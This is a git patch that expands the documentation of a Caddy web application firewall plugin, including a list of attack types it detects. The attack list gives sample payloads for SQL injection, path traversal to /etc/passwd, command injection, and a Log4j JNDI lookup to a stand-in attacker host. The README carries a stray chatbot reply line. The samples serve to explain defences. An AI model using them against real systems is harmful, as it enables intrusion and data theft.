From 21427cd555fb4d9e039c0fd839968ed98635c7a8 Mon Sep 17 00:00:00 2001 From: fabriziosalmi Date: Sun, 19 Jan 2025 18:58:27 +0100 Subject: [PATCH] docs updated. --- README.md | 18 +++- docs/README.md | 47 ++++++---- docs/attacks.md | 122 +++++++++++++++++++------ docs/blacklists.md | 70 +++++++++++---- docs/configuration.md | 42 ++++++--- docs/docker.md | 196 ++++++++++++++++++++++++++++++++++++++++- docs/dynamicupdates.md | 50 ++++++++++- docs/geoblocking.md | 7 -- docs/metrics.md | 171 ++++++++++++++++++++++++----------- docs/ratelimit.md | 72 +++++++++++++-- docs/rules.md | 159 ++++++++++++++++++++++----------- docs/scripts.md | 149 ++++++++++++++++++++++++------- docs/testing.md | 107 ++++++++++++++++++---- 13 files changed, 963 insertions(+), 247 deletions(-) diff --git a/README.md b/README.md index 0504413..1f9103a 100644 --- a/README.md +++ b/README.md @@ -1,3 +1,5 @@ +Okay, here's the updated `README.md` with the improved index, incorporating the file locations in `/docs` and making it more user-friendly: + # 🛡️ Caddy WAF Middleware A robust, highly customizable, and feature-rich **Web Application Firewall (WAF)** middleware for the Caddy web server. This middleware provides **advanced protection** against a comprehensive range of web-based threats, seamlessly integrating with Caddy and offering flexible configuration options to secure your applications effectively. @@ -137,7 +139,21 @@ Here's a minimal Caddyfile example to get started: For complete documentation, including configuration options, rule format details, protected attack types, testing strategies, and more, please refer to the `/docs` directory in this repository. -[Link to `/docs`](/docs/) +### 📑 Table of Contents + +1. [**Installation**](docs/installation.md) - *Instructions for installing the Caddy WAF middleware.* +2. [**Configuration Options**](docs/configuration.md) - *Detailed explanation of all available configuration settings.* +3. 
[**Rules Format (`rules.json`)**](docs/rules.md) - *A comprehensive guide to defining custom rules using the JSON format.* +4. [**Blacklist Formats**](docs/blacklists.md) - *Documentation of the formats used for defining IP and DNS blacklists.* +5. [**Rate Limiting**](docs/ratelimit.md) - *How to configure rate limiting, including parameters and usage.* +6. [**Country Blocking and Whitelisting**](docs/geoblocking.md) - *Details on how to configure country-based blocking and whitelisting.* +7. [**Protected Attack Types**](docs/attacks.md) - *An overview of the wide range of web-based threats that the Caddy WAF is designed to protect against.* +8. [**Dynamic Updates**](docs/dynamicupdates.md) - *How to dynamically update the WAF rules and other settings without downtime.* +9. [**Metrics**](docs/metrics.md) - *Details about the WAF's metrics endpoint and the different metrics collected.* +10. [**Prometheus Metrics**](docs/prometheus.md) - *Instructions on how to expose WAF metrics using the Prometheus format.* +11. [**Rule/Blacklist Population Scripts**](docs/scripts.md) - *Documentation on the provided scripts to automatically fetch, update and generate rules and blacklists.* +12. [**Testing**](docs/testing.md) - *Guidance on how to test the WAF's effectiveness using the provided testing tools.* +13. [**Docker Support**](docs/docker.md) - *Instructions on how to build and run the WAF using Docker.* --- diff --git a/docs/README.md b/docs/README.md index 0b843af..ff12a05 100644 --- a/docs/README.md +++ b/docs/README.md @@ -1,21 +1,36 @@ -# 🛡️ Caddy WAF Middleware +# 🛡️ Caddy WAF Middleware Documentation A robust, highly customizable, and feature-rich **Web Application Firewall (WAF)** middleware for the Caddy web server. This middleware provides **advanced protection** against a comprehensive range of web-based threats, seamlessly integrating with Caddy and offering flexible configuration options to secure your applications effectively. 
+This documentation provides everything you need to deploy and manage the Caddy WAF middleware effectively. + ## 📑 Table of Contents -1. * [Configuration Options](configuration.md) -2. * [Rules Format](rules.md) -3. * [Metrics](metrics.md) -4. * [Protected Attack Types](attacks.md) -5. * [Blacklist Formats](blacklists.md) -6. * [Rate Limiting](ratelimit.md) -7. * [Country Blocking and Whitelisting](geoblocking.md) -8. * [Dynamic Updates](dynamicupdates.md) -9. * [Testing](testing.md) -10. * [Docker Support](docker.md) -11. * [Rule/Blacklist Population Scripts](scripts.md) -12. * [Prometheus Metrics](prometheus.md) - - ---- +### 🚀 Getting Started + +1. **[Introduction](introduction.md)** - *Overview of the Caddy WAF, its purpose, and key benefits.* (Optional - Add if you have an intro doc, otherwise this index page serves as intro) +2. **[Installation](installation.md)** - *Instructions for installing the Caddy WAF middleware.* (Optional - if you have an explicit installation document) + +### ⚙️ Core Configuration + +3. **[Configuration Options](configuration.md)** - *Detailed explanation of all available configuration settings, including how to set up the different options and settings of the WAF.* +4. **[Rules Format (`rules.json`)](rules.md)** - *A comprehensive guide to defining custom rules using the JSON format, with details about all the fields available and examples on how to use them.* +5. **[Blacklist Formats](blacklists.md)** - *Documentation of the formats used for defining IP and DNS blacklists, providing examples and guidelines for managing these files.* +6. **[Rate Limiting](ratelimit.md)** - *How to configure rate limiting, including parameters, usage and caveats.* +7. **[Country Blocking and Whitelisting](geoblocking.md)** - *Details on how to configure country-based blocking and whitelisting using the MaxMind GeoIP2 database, including how to obtain the necessary files.* + +### 🛡️ Security Features + +8. 
**[Protected Attack Types](attacks.md)** - *An overview of the wide range of web-based threats that the Caddy WAF is designed to protect against.* +9. **[Dynamic Updates](dynamicupdates.md)** - *How to dynamically update the WAF rules and other settings without downtime or restarting the Caddy server.* + +### 📊 Monitoring and Management + +10. **[Metrics](metrics.md)** - *Details about the WAF's metrics endpoint and the different metrics collected, which provide insights into traffic patterns and WAF behavior, to help fine-tune the rules.* +11. **[Prometheus Metrics](prometheus.md)** - *Instructions on how to expose WAF metrics using the Prometheus format, for integration with your monitoring system.* +12. **[Rule/Blacklist Population Scripts](scripts.md)** - *Documentation on the provided scripts to automatically fetch, update and generate rules and blacklists from external resources.* + +### 🧪 Testing and Deployment + +13. **[Testing](testing.md)** - *Guidance on how to test the WAF's effectiveness using the provided testing tools, with different ways of testing the WAF functionality.* +14. **[Docker Support](docker.md)** - *Instructions on how to build and run the WAF using Docker, including best practices for containerized deployments.* diff --git a/docs/attacks.md b/docs/attacks.md index 19ada20..b8e02cd 100644 --- a/docs/attacks.md +++ b/docs/attacks.md @@ -1,27 +1,97 @@ -# 🛡️ Protected Attack Types +# 🛡️ Attacks -1. **SQL Injection (SQLi):** Detects and blocks attempts to inject malicious SQL code. -2. **Cross-Site Scripting (XSS):** Protects against the injection of malicious scripts into web pages. -3. **Path Traversal:** Blocks access to restricted files and directories through directory traversal techniques. -4. **Remote Code Execution (RCE):** Detects and prevents attempts to execute arbitrary commands on the server. -5. **Log4j Exploits:** Identifies and blocks Log4j vulnerability related attack patterns. -6. 
**Protocol Attacks:** Protects against attacks targeting sensitive protocol or configuration files. -7. **Scanner Detection:** Detects and blocks requests originating from known vulnerability scanners. -8. **Header & Cookie Injection:** Detects and blocks malicious content injected via headers and cookies. -9. **Insecure Deserialization:** Blocks requests with potentially malicious serialized data. -10. **HTTP Request Smuggling:** Prevents attacks that bypass security devices using inconsistent header combinations. -11. **HTTP Response Splitting:** Blocks attempts to inject malicious code through header manipulation. -12. **Insecure Direct Object Reference (IDOR):** Detects attempts to access resources using predictable object IDs. -13. **Server-Side Request Forgery (SSRF):** Prevents attacks that make the server perform unauthorized requests. -14. **XML External Entity (XXE) Injection:** Blocks attacks leveraging XML external entity processing. -15. **Server-Side Template Injection (SSTI):** Prevents code injection through template engines. -16. **Mass Assignment:** Blocks unauthorized modification of object attributes through uncontrolled input. -17. **NoSQL Injection:** Prevents malicious NoSQL queries designed to bypass authentication or steal data. -18. **XPath Injection:** Blocks attempts to manipulate XML documents with malicious XPath queries. -19. **LDAP Injection:** Detects and prevents the injection of malicious data into LDAP queries. -20. **XML Injection:** Detects various attacks exploiting XML manipulation. -21. **File Upload:** Blocks malicious file uploads to prevent execution of unwanted code. -22. **JWT Attacks:** Detects JWT tampering attempts and bypasses. -23. **GraphQL Injection:** Blocks attempts to perform unauthorized operations or extract data via GraphQL queries. -24. **Clickjacking:** Mitigates clickjacking attempts by preventing rendering the protected content inside a frame. -25. 
**Cross-Site Request Forgery (CSRF):** Blocks CSRF attacks by preventing unauthorized requests from being performed. +The WAF is designed to protect web applications against a wide array of attack vectors. It utilizes a combination of pattern matching, anomaly scoring, and other security mechanisms to detect and prevent these attacks. Here's a comprehensive overview of the attack types that the WAF is configured to protect against: + +1. **SQL Injection (SQLi):** + * **Description:** SQL Injection is a code injection technique used to attack data-driven applications, allowing malicious actors to interfere with the queries that an application makes to its database. Attackers can execute malicious SQL statements that could bypass authentication, access or modify sensitive data, or even gain control of the database server. + * **WAF Protection:** The WAF uses regular expressions and pattern matching to detect common SQL injection keywords and syntax within request parameters, headers, and body. It can detect attempts to manipulate SQL queries using techniques like UNION injections, comment bypasses, and others. + * **Example Attack:** `user' OR '1'='1'; --` +2. **Cross-Site Scripting (XSS):** + * **Description:** XSS attacks involve injecting malicious scripts (typically JavaScript) into web pages viewed by other users. These scripts can be used to steal session cookies, redirect users to malicious sites, or modify the content of a page in a way that tricks users. + * **WAF Protection:** The WAF scans for common XSS payloads within request headers, parameters, and the body, particularly within user-submitted content. It uses pattern matching to detect script tags, event handlers, and other potential XSS attack vectors. It can also detect XSS through encoded payloads. + * **Example Attack:** `` +3. 
**Path Traversal:** + * **Description:** Path traversal attacks exploit vulnerabilities that allow an attacker to access restricted files and directories on a web server by manipulating file paths in the request. This can lead to unauthorized access to configuration files, source code, or other sensitive information. + * **WAF Protection:** The WAF blocks requests containing path traversal sequences like `../` or `..\\`, which are commonly used to access files outside the web application's document root. It also scans for encoded path traversal sequences. + * **Example Attack:** `../../../../etc/passwd` +4. **Remote Code Execution (RCE):** + * **Description:** RCE attacks enable malicious actors to execute arbitrary code on a server. This can result from vulnerabilities in application software, operating systems, or other components. Attackers can use RCE to gain full control of a server, install malware, or steal sensitive data. + * **WAF Protection:** The WAF detects and blocks known RCE patterns including command injection attempts, and exploits of known vulnerabilities, by looking at command injection keywords in various parts of the request (headers, query parameters, body). + * **Example Attack:** `$(whoami)` or `| cat /etc/passwd` +5. **Log4j Exploits:** + * **Description:** The Log4j vulnerability (CVE-2021-44228) allows attackers to execute arbitrary code by injecting crafted input strings that are processed by the vulnerable Log4j library. + * **WAF Protection:** The WAF identifies and blocks common Log4j exploit patterns within the request body, query parameters, headers, and URI. The patterns look for specific strings that are used to exploit the vulnerability. + * **Example Attack:** `${jndi:ldap://attacker.com/evil}` +6. **Protocol Attacks:** + * **Description:** These are attacks that target sensitive protocol or configuration files like `.htaccess`, `.git`, or other private resources that should not be accessed directly through the web. 
+ * **WAF Protection:** The WAF blocks access to these files and directories by using a rule that looks for known file names and path patterns. + * **Example Attack:** `/.git/config` or `/web.config` +7. **Scanner Detection:** + * **Description:** Vulnerability scanners are automated tools used to discover security issues in web applications. Malicious actors use these tools to probe systems for weaknesses and plan attacks. + * **WAF Protection:** The WAF identifies and blocks requests that are associated with known vulnerability scanners by looking for specific headers, user agent strings, and other characteristics. +8. **Header & Cookie Injection:** + * **Description:** Attackers attempt to inject malicious content through HTTP headers or cookies to manipulate application behavior or exploit vulnerabilities. This can be used to launch various types of attacks, like XSS or session hijacking. + * **WAF Protection:** The WAF inspects both request and response headers and cookies for malicious patterns, blocking any requests that contain suspicious data in these areas. + * **Example Attack:** Setting a cookie with a malicious Javascript payload. +9. **Insecure Deserialization:** + * **Description:** This attack occurs when an application deserializes data from an untrusted source, leading to arbitrary code execution if the data has been maliciously crafted. + * **WAF Protection:** The WAF detects requests with serialized data and blocks any known insecure deserialization payloads. + * **Example Attack:** Malicious serialized Java object. +10. **HTTP Request Smuggling:** + * **Description:** HTTP Request Smuggling involves crafting malicious HTTP requests that exploit discrepancies between how front-end proxies and back-end servers interpret requests. This can allow attackers to bypass security checks or access restricted resources. 
+ * **WAF Protection:** The WAF can detect and block requests that contain suspicious header combinations that can be used for request smuggling attacks. +11. **HTTP Response Splitting:** + * **Description:** HTTP Response Splitting occurs when an attacker injects malicious data into the header of a response that causes the server to create additional HTTP responses, resulting in XSS or other attacks. + * **WAF Protection:** The WAF detects and blocks attempts to inject newline characters or other malicious content into HTTP response headers. +12. **Insecure Direct Object Reference (IDOR):** + * **Description:** IDOR vulnerabilities occur when an application exposes direct references to internal objects, allowing attackers to bypass authorization checks and access resources they should not have access to by using predictable identifiers. + * **WAF Protection:** The WAF detects attempts to access resources using sequential IDs or patterns associated with IDOR attacks. The WAF does not fully prevent these attacks as that would require knowing the valid identifiers, so it relies on generic patterns. + * **Example Attack:** Modifying a user ID in the URL to access another user's profile. +13. **Server-Side Request Forgery (SSRF):** + * **Description:** SSRF attacks enable a malicious actor to make requests from a server to internal resources, allowing them to bypass firewalls, access sensitive systems or data, and perform port scanning and information gathering. + * **WAF Protection:** The WAF blocks or flags requests that attempt to access internal resources or known sensitive ports by looking at the requested URL or domain. + * **Example Attack:** `http://localhost:8080/admin/users` or `http://127.0.0.1:3306` +14. **XML External Entity (XXE) Injection:** + * **Description:** XXE attacks occur when an attacker manipulates XML input to make an application access external resources. 
This can lead to information disclosure or denial-of-service attacks by reading local files or making connections to internal resources. + * **WAF Protection:** The WAF detects and blocks attempts to use external entities and other XML manipulation attempts. + * **Example Attack:** `]> ` +15. **Server-Side Template Injection (SSTI):** + * **Description:** SSTI attacks exploit template engines by injecting malicious template code that can be executed on the server, resulting in RCE and other malicious behavior. + * **WAF Protection:** The WAF detects patterns related to SSTI attacks, by looking for common template engine syntax within the request body or query parameters. + * **Example Attack:** `{{7*7}}` +16. **Mass Assignment:** + * **Description:** Mass assignment vulnerabilities occur when an application automatically binds user input directly to object attributes without proper sanitization. Attackers can exploit this by injecting malicious input to modify fields they should not have access to. + * **WAF Protection:** The WAF can detect and block attempts to manipulate attributes that should not be modified by analyzing request bodies. + * **Example Attack:** Adding a `is_admin: true` field to an object to elevate user privileges. +17. **NoSQL Injection:** + * **Description:** NoSQL injection is similar to SQL injection but targets NoSQL databases. Attackers can inject malicious NoSQL queries to bypass authentication, access or modify data, or perform other unwanted actions. + * **WAF Protection:** The WAF detects common NoSQL injection patterns using regular expressions. + * **Example Attack:** `{$where: '1==1'}` +18. **XPath Injection:** + * **Description:** XPath injection involves injecting malicious XPath queries to manipulate XML documents. Attackers can use this technique to access sensitive data within XML documents or perform unauthorized operations. 
+ * **WAF Protection:** The WAF detects and blocks malicious XPath queries by looking for specific syntax patterns. + * **Example Attack:** `' or '1'='1'` +19. **LDAP Injection:** + * **Description:** LDAP injection is similar to SQL injection but targets LDAP queries. It can allow an attacker to bypass authentication or read directory information. + * **WAF Protection:** The WAF detects and blocks attempts to inject malicious content to manipulate LDAP queries. + * **Example Attack:** `(|(username=*)(password=*))` +20. **XML Injection:** + * **Description:** XML Injection attacks try to manipulate XML by injecting malicious content that can be used to cause a denial of service, bypass authentication, or even execute code on the server. + * **WAF Protection:** The WAF has rules that detect different kinds of XML attacks, including injection of malicious code. +21. **File Upload:** + * **Description:** This attack involves uploading malicious files to a web server that can be used to execute code or perform other malicious actions. + * **WAF Protection:** The WAF can detect and block attempts to upload files based on their extension, type, or other characteristics. +22. **JWT Attacks:** + * **Description:** Attacks that try to manipulate JSON Web Tokens (JWT) to bypass authentication or impersonate users by tampering with the header, payload, or signature. + * **WAF Protection:** The WAF detects JWT tampering by validating and analyzing JWTs present in requests and looking for common bypass attempts. +23. **GraphQL Injection:** + * **Description:** GraphQL injection attacks exploit vulnerabilities in GraphQL APIs to execute unauthorized operations or retrieve sensitive data. Attackers can inject malicious queries, mutations, or fragments into GraphQL requests. + * **WAF Protection:** The WAF detects and blocks common patterns of GraphQL injection attempts. +24. 
**Clickjacking:** + * **Description:** Clickjacking is an attack technique where malicious actors trick users into clicking on a hidden element that is placed over a legitimate webpage. + * **WAF Protection:** The WAF has rules that mitigate clickjacking attempts by adding headers that prevent the protected page from being rendered inside a frame. +25. **Cross-Site Request Forgery (CSRF):** + * **Description:** CSRF attacks force logged-in users to perform unwanted actions on a web application. The attacker tricks the user's browser into making a request to the server while the user is authenticated, without them being aware of it. + * **WAF Protection:** The WAF has rules that protect against CSRF attacks by checking for a CSRF token and by adding headers to prevent such attacks from being performed, if implemented in the application. + +By providing comprehensive protection against these common attack types, the WAF acts as a critical security layer for web applications. Regular updates of the WAF rules are essential to ensure continued protection against new and evolving threats. The protection mechanism is mostly based on pattern matching, so it cannot guarantee full protection against every variation of these attacks. diff --git a/docs/blacklists.md b/docs/blacklists.md index a6bcf34..d76e8c8 100644 --- a/docs/blacklists.md +++ b/docs/blacklists.md @@ -1,24 +1,62 @@ -# 🚫 Blacklist Formats +# 🚫 Blacklists + +This document outlines the formats used for various blacklists. These lists are used to identify and block potentially malicious or unwanted entities. Each list type has its own specific syntax and interpretation rules to ensure proper functionality. + +## General Considerations + +* **Case Sensitivity:** While DNS blacklist entries are explicitly lowercased, IP addresses are generally treated as case-insensitive. 
Any hostname or resource record included in an IP blacklist should be standardized in lowercase. +* **Line Handling:** Each entry must be on its own line. +* **Whitespace:** Leading and trailing whitespace should generally be ignored (trimmed) before processing each line, unless specifically defined otherwise. +* **Comments:** Lines beginning with `#` are considered comments and should be ignored by the processing logic. +* **Empty Lines:** Empty lines are permitted and should be skipped. +* **UTF-8 Encoding:** All blacklist files should be encoded using UTF-8 to ensure proper handling of international characters (in the rare case they appear in domain names) and avoid compatibility issues. +* **Error Handling:** Malformed entries should be logged or handled gracefully, with an option to skip them rather than halt the entire process. +* **Updates:** These lists may be automatically updated on a schedule. +* **Performance:** The chosen formats are designed to be easily parsed and matched against for efficient runtime operations. ## IP Blacklist (`ip_blacklist.txt`) -* Supports single IP addresses, CIDR ranges, and comments (lines starting with `#`). +* **Purpose:** To block network traffic originating from or destined for specified IP addresses or address ranges. +* **Format:** + * **Single IPv4 Addresses:** Standard dotted-decimal notation (e.g., `192.168.1.1`). + * **Single IPv6 Addresses:** Standard colon-separated hexadecimal notation (e.g., `2001:0db8:85a3:0000:0000:8a2e:0370:7334`, but also allows the shortened forms e.g., `2001:db8::7334`) + * **IPv4 CIDR Ranges:** Uses CIDR notation (e.g., `192.168.0.0/24`). Represents a contiguous block of IP addresses. + * **IPv6 CIDR Ranges:** Uses CIDR notation (e.g., `2001:db8::/32`). Represents a contiguous block of IPv6 addresses. + * **Comments:** Lines beginning with `#` are ignored. 
+* **Example:** -```text -192.168.1.1 -10.0.0.0/8 -2001:db8::/32 -# This is a comment -``` + ```text + 192.168.1.1 + 10.0.0.0/8 + 2001:db8::/32 + 2001:0db8:85a3:0000:0000:8a2e:0370:7334 + # This is a comment about a range + 172.16.0.0/12 # Private IP range + 172.16.1.250 + 2a02:2700::/32 + ``` +* **Matching Logic:** An IP address being checked will be matched against each entry. A match is successful if the address is: + * Identical to a single IP address listed. + * Within the range defined by a CIDR notation entry. +* **Implementation Notes:** A parser should validate entries against standard formats and potentially log invalid entries. Efficient data structures such as prefix trees (Tries) can enhance lookup performance, particularly with large lists. ## DNS Blacklist (`dns_blacklist.txt`) -* Contains one domain per line (comments are allowed with `#`). -* All entries are lowercased before matching. - -```text -malicious.com -evil.example.org -# This is a comment -``` +* **Purpose:** To block access to or from websites and services associated with specified domain names. +* **Format:** + * One fully qualified domain name (FQDN) per line. + * Comments are supported using `#`. + * All entries will be converted to lowercase before matching. + * Subdomains are not automatically included, unless explicit entries exist for them, and wildcard domains are not supported within these lists. + * Internationalized Domain Names (IDNs) must be stored as Punycode, following standard conventions (e.g., `xn--domain--432a.com`). +* **Example:** + ```text + malicious.com + evil.example.org + # Example of a comment + phishing-site.net + another.malware.com + xn--domain--432a.com + ``` +* **Matching Logic:** A hostname will be matched (in a case-insensitive manner once lowercased) against each entry in the list. A match occurs if the hostname being checked is *exactly* equal to an entry, e.g. `evil.example.org` would not match `sub.evil.example.org`. 
The matching should happen against the FQDN (Fully Qualified Domain Name). diff --git a/docs/configuration.md b/docs/configuration.md index e316b1d..66f84ac 100644 --- a/docs/configuration.md +++ b/docs/configuration.md @@ -1,18 +1,32 @@ -# ⚙️ Configuration Options +# ⚙️ Configuration + +The WAF provides a variety of configuration options to control its behavior, allowing for precise customization of security policies. These options are typically set within the WAF's configuration file (e.g., Caddyfile). The following table describes each option in detail: | Option | Description | Example | |------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------| -| `anomaly_threshold` | Sets the anomaly score threshold at which requests will be blocked. | `anomaly_threshold 20` | -| `rule_file` | Path to a JSON file containing the WAF rules. | `rule_file rules.json` | -| `ip_blacklist_file` | Path to a file containing blacklisted IP addresses and CIDR ranges. | `ip_blacklist_file blacklist.txt` | -| `dns_blacklist_file` | Path to a file containing blacklisted domain names. | `dns_blacklist_file domains.txt` | -| `rate_limit` | Configures the rate limiting parameters. The syntax is `requests`, `window`, and optional `cleanup_interval`. Use `paths` to set specific paths to rate limit, and `match_all_paths` to specify if only matching paths should be rate limited (`false`), or all paths except matching should be rate limited (`true`). | `rate_limit { requests 100 window 1m cleanup_interval 5m paths /api/v1/.* /admin/.* match_all_paths false }` | -| `block_countries` | Enables country blocking, requires the GeoIP database path and ISO country codes. 
| `block_countries GeoLite2-Country.mmdb RU CN KP` | -| `whitelist_countries` | Enables country whitelisting, requires the GeoIP database path and ISO country codes. | `whitelist_countries GeoLite2-Country.mmdb US` | -| `log_severity` | Sets the minimum logging level (`debug`, `info`, `warn`, `error`). | `log_severity debug` | -| `log_json` | Enables JSON formatted log output. | `log_json` | -| `log_path` | Sets the path for the log file. If not specified, it will default to `/var/log/caddy/waf.json`. | `log_path debug.json` | -| `redact_sensitive_data` | When enabled, it will redact sensitive data from the query string on the logs. | `redact_sensitive_data` | -| `custom_response` | Defines a custom response for the specified status code, following the syntax `custom_response STATUS_CODE content_type body_string_or_file_path`. Can load from a file or use a plain text string as response. | `custom_response 403 application/json error.json` or `custom_response 403 text/html "

<h1>Access Denied</h1>

"` | -``` +| **`anomaly_threshold`** | **Anomaly Score Threshold:** This option sets the numerical threshold for the WAF's anomaly score. When the accumulated score for a request, calculated from rule hits, exceeds this value, the request is blocked. This parameter allows for blocking of traffic that triggers multiple rules and exceeds a total risk score. A lower threshold will cause the WAF to block requests with a lower overall score, while a higher threshold will only block requests that trigger more rules or rules with a high `score` value. | `anomaly_threshold 20`, `anomaly_threshold 10`, `anomaly_threshold 50` | +| **`rule_file`** | **Path to Rules File:** Specifies the path to the JSON file (`rules.json`) containing the WAF's ruleset. The WAF reads and parses this file to determine which requests to block or log. It is a critical option as the WAF won't work without this file configured. The file path can be relative or absolute. | `rule_file rules.json`, `rule_file /etc/waf/custom_rules.json` | +| **`ip_blacklist_file`** | **Path to IP Blacklist File:** Defines the path to the text file containing the list of blacklisted IP addresses and CIDR ranges. The WAF will block any requests originating from an IP address or range listed in this file. The file path can be relative or absolute. The file format must adhere to the format specified in the documentation for this functionality. | `ip_blacklist_file blacklist.txt`, `ip_blacklist_file /opt/waf/bad_ips.txt` | +| **`dns_blacklist_file`** | **Path to DNS Blacklist File:** Specifies the path to the text file containing a list of blacklisted domain names (one per line). The WAF will block or log any request that includes a domain name matching an entry in this list, often used to block requests to or from known malicious sites. The file path can be relative or absolute. The file format must adhere to the format specified in the documentation for this functionality. 
| `dns_blacklist_file domains.txt`, `dns_blacklist_file /var/waf/bad_domains.txt` | +| **`rate_limit`** | **Rate Limiting Configuration:** Enables and configures rate limiting for incoming requests. It requires a block of parameters containing rate limiting options (`requests`, `window`, and `cleanup_interval`), as well as the `paths` that will be affected by the rate limiting. `match_all_paths` specifies if only matching paths should be rate limited or if all paths except the matching paths should be rate limited. Refer to the documentation for the correct syntax for the rate limiting configuration. | `rate_limit { requests 100 window 1m cleanup_interval 5m paths /api/v1/.* /admin/.* match_all_paths false }`,
`rate_limit { requests 50 window 10s cleanup_interval 1m }`,
`rate_limit { requests 200 window 30s cleanup_interval 10m paths /public/.* match_all_paths true}` | +| **`block_countries`** | **Country Blocking:** Enables the blocking of requests based on their originating country. It requires the path to the MaxMind GeoIP2 database (`GeoLite2-Country.mmdb`) and a list of ISO country codes to block. Requests from these specified countries will be blocked. This parameter must specify the full path to the `GeoLite2-Country.mmdb` file to work correctly. | `block_countries GeoLite2-Country.mmdb RU CN KP`,
`block_countries /opt/waf/GeoLite2-Country.mmdb BR IR` | +| **`whitelist_countries`** | **Country Whitelisting:** Enables the whitelisting of requests based on their originating country. It requires the path to the MaxMind GeoIP2 database (`GeoLite2-Country.mmdb`) and a list of ISO 3166-1 alpha-2 country codes to whitelist. Requests from any country that is *not* in this whitelist will be blocked. Only one of `block_countries` or `whitelist_countries` can be active at the same time. This parameter must specify the full path to the `GeoLite2-Country.mmdb` file to work correctly. | `whitelist_countries GeoLite2-Country.mmdb US`, `whitelist_countries /etc/waf/GeoLite2-Country.mmdb CA GB AU` | +| **`log_severity`** | **Minimum Logging Level:** Sets the minimum severity level for log messages. Only messages at or above this level will be included in the logs. This option is useful for controlling the volume of log output and focusing on more important events. Supported levels (in increasing severity) are: `debug`, `info`, `warn`, and `error`. | `log_severity debug`, `log_severity info`, `log_severity warn`, `log_severity error` | +| **`log_json`** | **JSON Log Output:** Enables the use of JSON format for log messages. This can help with parsing the log messages with external tools and services. If enabled, the logs will be formatted as JSON objects; otherwise they will be in plain text. | `log_json` | +| **`log_path`** | **Log File Path:** Specifies the path for the WAF log file. This is where the WAF will output its log messages. If this option is not configured, logs will be directed to a default path (e.g., `/var/log/caddy/waf.json` or to the standard output). The file path can be relative or absolute, but the directory must exist. 
| `log_path debug.json`, `log_path /var/log/waf/access.log`, `log_path ./waf.log` | +| **`redact_sensitive_data`** | **Query String Data Redaction:** When enabled, this option redacts potentially sensitive data from the request query string in log messages. This is important for compliance with privacy regulations and preventing exposure of sensitive information in logs. Query string data can include credentials, personally identifiable information or other private information. | `redact_sensitive_data` | +| **`custom_response`** | **Custom Error Responses:** This powerful option allows for defining custom HTTP responses to send when a request is blocked, or any other situation where a custom response is desirable. It requires three parameters: the HTTP status code for the response, the response `content_type`, and a text string or path to the response content. You can either include the content directly in the configuration, or specify a path to a file containing the content, allowing custom responses to be as simple or complex as required. If a file path is specified, it will load the file content on WAF startup and use it as the response body. | `custom_response 403 application/json error.json`, `custom_response 404 text/plain "Not Found"`, `custom_response 401 text/html /opt/waf/unauthorized.html`, `custom_response 429 text/plain "Too Many Requests"` | + +### Important Considerations: + +* **Mutual Exclusivity:** Note that some options are mutually exclusive (e.g., `block_countries` and `whitelist_countries`); only one of them can be active at the same time. +* **File Paths:** When specifying file paths (e.g., `rule_file`, `ip_blacklist_file`, `dns_blacklist_file`, and `log_path`), ensure that the WAF process has the correct permissions to read those files and write to those directories, where applicable. +* **Option precedence:** Some configurations will take precedence if there is a conflict. E.g. 
rate limiting could be configured, and a rule could block that specific request before the rate limiter is triggered, or vice versa. +* **Validation:** Confirm that the configuration is valid by testing it and reviewing any errors that appear on startup. +* **Defaults:** Know the default values of the parameters so you can confirm they fit your requirements. +* **Error messages:** Read startup error messages closely; they should point to the likely issue with the current configuration, such as non-existing files or invalid formats. +* **Logging:** Logging is important to troubleshoot any issues with the configuration. +* **Security:** Secure access to the configuration and log files to prevent unauthorized modifications and information leaks. +* **Dynamic Changes:** Changes to the `Caddyfile` options will usually require reloading (for example with `caddy reload`) or restarting the service to pick up the new settings. +By carefully configuring these options, you can tailor the WAF's behavior to meet your specific security requirements, balancing protection with performance. Thorough testing after making configuration changes is a must to be sure the WAF is working as expected. This fine-grained level of control ensures that the WAF can act as an effective security layer for your web application. diff --git a/docs/docker.md b/docs/docker.md index ce11e12..e7e3bd4 100644 --- a/docs/docker.md +++ b/docs/docker.md @@ -1,12 +1,200 @@ -# 🐳 Docker Support +# 🐳 Docker -Build and run a Docker container: +Docker provides a powerful and efficient way to package and run the WAF as a containerized application. This approach offers numerous advantages, including portability, consistency, simplified deployment, and scalability. This section provides comprehensive information on building and running the WAF within Docker containers, following industry best practices. 
+ +## Building the Docker Image + +The Docker image is built using the `docker build` command, executed from the project's root directory (where the `Dockerfile` is located): ```bash -# Build the Docker image docker build -t caddy-waf . +``` + +* **`docker build`**: This is the Docker command to build an image from a `Dockerfile`. +* **`-t caddy-waf`**: The `-t` flag tags the built image with the name `caddy-waf`. This tag is used later to reference the image when running containers. You can replace `caddy-waf` with your preferred image name and tag. It is recommended to prefix the image name with the registry, if you are deploying to registries other than Docker Hub, for example: `myregistry/caddy-waf`. +* **.**: The trailing dot (`.`) specifies that the build context is the current directory, where the `Dockerfile` and other necessary files are found. + +**Dockerfile Deep Dive:** + +The `Dockerfile` is responsible for defining how the Docker image is built. It should: + +* Start with a suitable base image. We use a multi-stage build, using `golang:1.22.3-alpine` as the builder image and `alpine:latest` as the final image. +* Install necessary tools for building: `git` (for cloning the repository) and `wget` (for downloading files), as well as `xcaddy` which is used to compile a custom version of `caddy`. +* Clone the WAF's Git repository. +* Fetch and install Go dependencies, including the required Caddy modules, the WAF plugin, and other modules. +* Download the GeoLite2 Country database. +* Build the Caddy binary with the WAF plugin using `xcaddy`. +* Copy the compiled Caddy binary, GeoIP database, configuration files (rules, blacklists, Caddyfile) into the final image. +* Create a non-root user (`caddy`) for security. +* Set appropriate permissions for the files inside the container. +* Expose the required HTTP port (default is `8080`). +* Define the command to execute when the container starts, which is to run Caddy using the specified Caddyfile. 
